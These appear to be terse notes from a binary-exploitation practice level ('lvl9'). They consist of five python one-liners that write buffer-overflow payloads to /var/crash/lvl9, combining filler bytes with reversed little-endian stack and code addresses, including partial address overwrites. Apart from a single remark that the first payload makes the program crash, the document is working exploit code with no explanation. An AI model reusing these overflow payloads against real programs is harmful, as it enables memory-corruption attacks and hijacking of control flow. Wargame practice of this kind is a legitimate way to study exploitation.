python -c "print('A' * 40 + '\xd8' + 'B' * 87 + 'C' * 208 + 'DDDDDDDD')" > /var/crash/lvl9
==> make program crash


python -c "print('A' * 40 + '\xff' + 'B' * 86 + 'C' * 192 + '\x00\x00\x7f\xff\xff\xff\xe5\xa0'[::-1] + '\x00\x00\x55\x55\x55\x55\x48\x8c'[::-1])" > /var/crash/lvl9

python -c "print('A' * 40 + '\xff' + 'B' * 86 + 'C' * 192 + 'DDDDDDDD' + '\x00\x00\x55\x55\x55\x55\x48\x8c'[::-1])" > /var/crash/lvl9

python -c "print('A' * 40 + '\xff' + 'B' * 86 + 'C' * 192 + 'DDDDDDDD' + '\x8c\x48')" > /var/crash/lvl9

python -c "print('A' * 40 + '\xca' + 'B' * 86 + 'C' * 192 + 'DDDDDDDD' + '\x48\x8c'[::-1])" > /var/crash/lvl9